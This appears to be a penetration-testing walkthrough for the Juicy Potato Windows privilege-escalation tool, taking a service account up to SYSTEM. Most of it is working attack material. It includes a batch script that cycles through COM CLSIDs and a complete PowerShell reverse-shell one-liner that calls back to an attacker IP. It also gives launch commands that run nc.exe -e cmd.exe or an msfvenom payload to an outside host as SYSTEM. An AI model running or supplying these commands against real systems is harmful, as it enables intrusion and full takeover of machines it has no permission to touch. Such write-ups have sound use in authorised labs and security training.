Juicy-Potato
Juicy Potato is a Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.
Exploitation
First Check that you’ve SeImpersonatePrivilege Enabled
whoami /priv
With systeminfo we can see the target OS name
Traget Arch
Now we gonna get CLSID for our target machine
Here my traget is Windows 7 Professional i can go for Windows 7 Enterprise, copy all the CLSID from CLSID.list file.
Open your favourite editor and paste all the CLSID and name the file CLSID.list.
Our target machine is 32-bit arch. Grab the Juicy Potato binary for 32-bit os.
We gonna make a test.bat file which gonna help you to execute the jp32.exe and find you a valid CLSID for attack.
Content of our test.bat file
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (C:\\Users\\Bob\Desktop\\CLSID.list) DO (
echo %%i !port!
C:\\Users\\Bob\\Desktop\\jp32.exe -z -l !port! -c %%i >> result.log
set RET=!ERRORLEVEL!
:: echo !RET!
if "!RET!" == "1" set /a port=port+1
)
Changes to Make
Note: C:\Users\Bob\Desktop\CLSID.list and C:\Users\Bob\Desktop\jp32.exe are the place where we gonna upload our CLSID.list file and jp32.exe (juicy potato 32-bit).
Using Powershell
Next we gonna create shell.bat file for our reverse ahell.
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.x.x',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Changes to make
NOTE: ‘10.10.x.x’,1234 is the attacker IP and listening port for our reverse shell.
Using msfvenom or nc.exe binary
generate a shell.exe binary using msfvenom.
Now upload jp32.exe, test.bat, CLSID.list, shell.bat or shell.exe / nc.exe to the user Desktop (same path that we used in our test.bat).
Now execute the test.bat
powershell Start-Process c:\Users\Bob\Desktop\test.bat (if not in powershell)
Start-Process c:\Users\Bob\Desktop\test.bat (if in powershell)
Now wait for 5-mins you will see result.log file is created type the file you gonna see bunch of CLSID.
We’re insterested in SYSTEM CLSID. Grab one of SYSTEM CLSID.
Now we’ve found valid CLSID for SYSTEM we can use that CLSID and get system shell.
Reverse Shell
Using Powershell shell.bat
c:\\Users\\Bob\\Desktop\\JuicyPotato.exe -l 1234 -p c:\\Users\\Bob\\Desktop\\shell.bat -t * -c {c980e4c2-c178-4572-935d-a8a429884806}
Using nc.exe
c:\\Users\\Bob\\Desktop\\jp32.exe -l 443 -p c:\\windows\\system32\\cmd.exe -a "/c c:\\Users\\Bob\\Desktop\\nc.exe -e cmd.exe 192.168.x.x 443" -t * -c {659cdea7-489e-11d9-a9cd-000d56965251}
Using shell.exe
c:\\Users\\Bob\\Desktop\\jp32.exe -l 443 -p c:\\windows\\system32\\cmd.exe -a "/c c:\\Users\\Bob\\Desktop\\shell.exe" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}